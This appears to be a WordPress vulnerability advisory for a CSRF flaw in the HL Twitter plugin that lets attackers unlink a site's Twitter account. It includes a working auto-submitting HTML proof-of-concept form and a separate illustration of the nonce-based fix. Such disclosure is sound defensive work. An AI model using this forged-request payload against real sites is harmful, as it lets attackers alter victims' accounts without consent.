wpexploit | Bob Matyas | WPEX-ID: C59A8B49-6F3E-452B-BA9B-50B80C522EE9
History: Apr 24, 2024 - 12:00 a.m.

HL Twitter <= 2014.1.18 - Unlink Twitter Account via CSRF

2024-04-24 00:00:00
Bob Matyas
55
csrf
unlink twitter
exploit
security patch
vulnerability update
information disclosure

AI Score

6.7

Confidence

Low

EPSS

0

Percentile

9.0%

Description: The plugin does not have a CSRF check when unlinking Twitter accounts, which could allow attackers to make logged-in admins perform such actions via a CSRF attack.

Make an admin open an HTML file containing:

```html
<body onload="document.forms[0].submit()">
    <form action="http://example.com/wp-admin/admin.php?page=hl_twitter_settings&action=unlink" method="POST">
        <input type="submit" name="submit" value="Unlink" class="button-primary">
    </form>
</body>
```

The Twitter connection will be removed (API tokens reset to `''`).
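The root cause is a state-changing admin action that accepts any POST without proof that the request originated from the plugin's own settings page. Below is an added illustration of the standard WordPress mitigation: a nonce emitted into the form and verified server-side before the tokens are touched. This is not the plugin's code; the function names `hl_twitter_render_unlink_form()` and `hl_twitter_handle_unlink()`, the nonce action name `hl_twitter_unlink`, and the option names are assumptions made for the example. Only the page and action parameters come from the advisory.

```php
<?php
// Added illustration (not HL Twitter's own code) of protecting the
// "unlink" action against CSRF in a WordPress admin page.
// Function names, the nonce action string and option names are hypothetical.

// 1. Render the unlink form with a nonce bound to this specific action.
function hl_twitter_render_unlink_form() {
    $url = admin_url( 'admin.php?page=hl_twitter_settings&action=unlink' );
    echo '<form method="post" action="' . esc_url( $url ) . '">';
    // Emits hidden _wpnonce (and _wp_http_referer) fields for the named action.
    wp_nonce_field( 'hl_twitter_unlink' );
    submit_button( 'Unlink', 'primary', 'submit' );
    echo '</form>';
}

// 2. Before changing any state, require POST, the right capability, and a valid nonce.
function hl_twitter_handle_unlink() {
    if ( ! isset( $_GET['page'], $_GET['action'] )
        || 'hl_twitter_settings' !== $_GET['page']
        || 'unlink' !== $_GET['action'] ) {
        return;
    }
    if ( 'POST' !== $_SERVER['REQUEST_METHOD'] ) {
        return; // never change state on a plain GET
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // check_admin_referer() validates $_REQUEST['_wpnonce'] against the action
    // name and calls wp_die() on failure, so a form submitted from another origin
    // (which cannot know the per-user nonce) never reaches the token reset.
    check_admin_referer( 'hl_twitter_unlink' );

    // Only now clear the stored API credentials (option names hypothetical).
    update_option( 'hl_twitter_oauth_token', '' );
    update_option( 'hl_twitter_oauth_token_secret', '' );
}
add_action( 'admin_init', 'hl_twitter_handle_unlink' );
```

With this in place the proof-of-concept form above fails at `check_admin_referer()` because it carries no `_wpnonce` value. The capability check is kept separately: a nonce proves intent, not authorization, and both are needed for a privileged state change.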
